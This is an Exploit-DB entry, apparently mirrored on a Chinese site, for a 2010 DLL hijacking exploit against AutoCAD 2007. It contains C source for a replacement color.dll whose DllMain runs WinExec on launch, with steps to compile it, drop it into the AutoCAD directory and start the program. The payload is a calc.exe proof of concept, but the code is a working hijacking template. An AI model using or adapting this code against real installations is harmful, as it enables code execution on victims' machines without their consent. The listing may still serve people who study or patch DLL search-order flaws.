Autodesk AutoCAD 2007 – ‘color.dll’ DLL Hijacking - 体验盒子

作者： xsploited security

日期： 2010-08-25

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/14793/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

/*

Description:

A vulnerability exists in windows that allows other applications dynamic link libraries

to execute malicious code without the users consent, in the privelage context of the targeted application.

Title: Autocad 2007 Professional dll (color.dll) Hijacking exploit

Author: xsploited security

URL: http://www.x-sploited.com/

Email: xsploitedsecurity@gmail.com

Instructions:

1. Compile dll

2. Replace color.dll in autocad directory with your newly compiled dll

3. Launch Autocad 2007

4. Boom calc!

Shoutz:

kAoTiX, Deca, Drizzle, 0xJeremy, Sheep, SpliT, all other security guru's and teams.

*/

#include <windows.h>

int pwnme()

{

WinExec("calc", SW_NORMAL);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

pwnme();

return 0;

}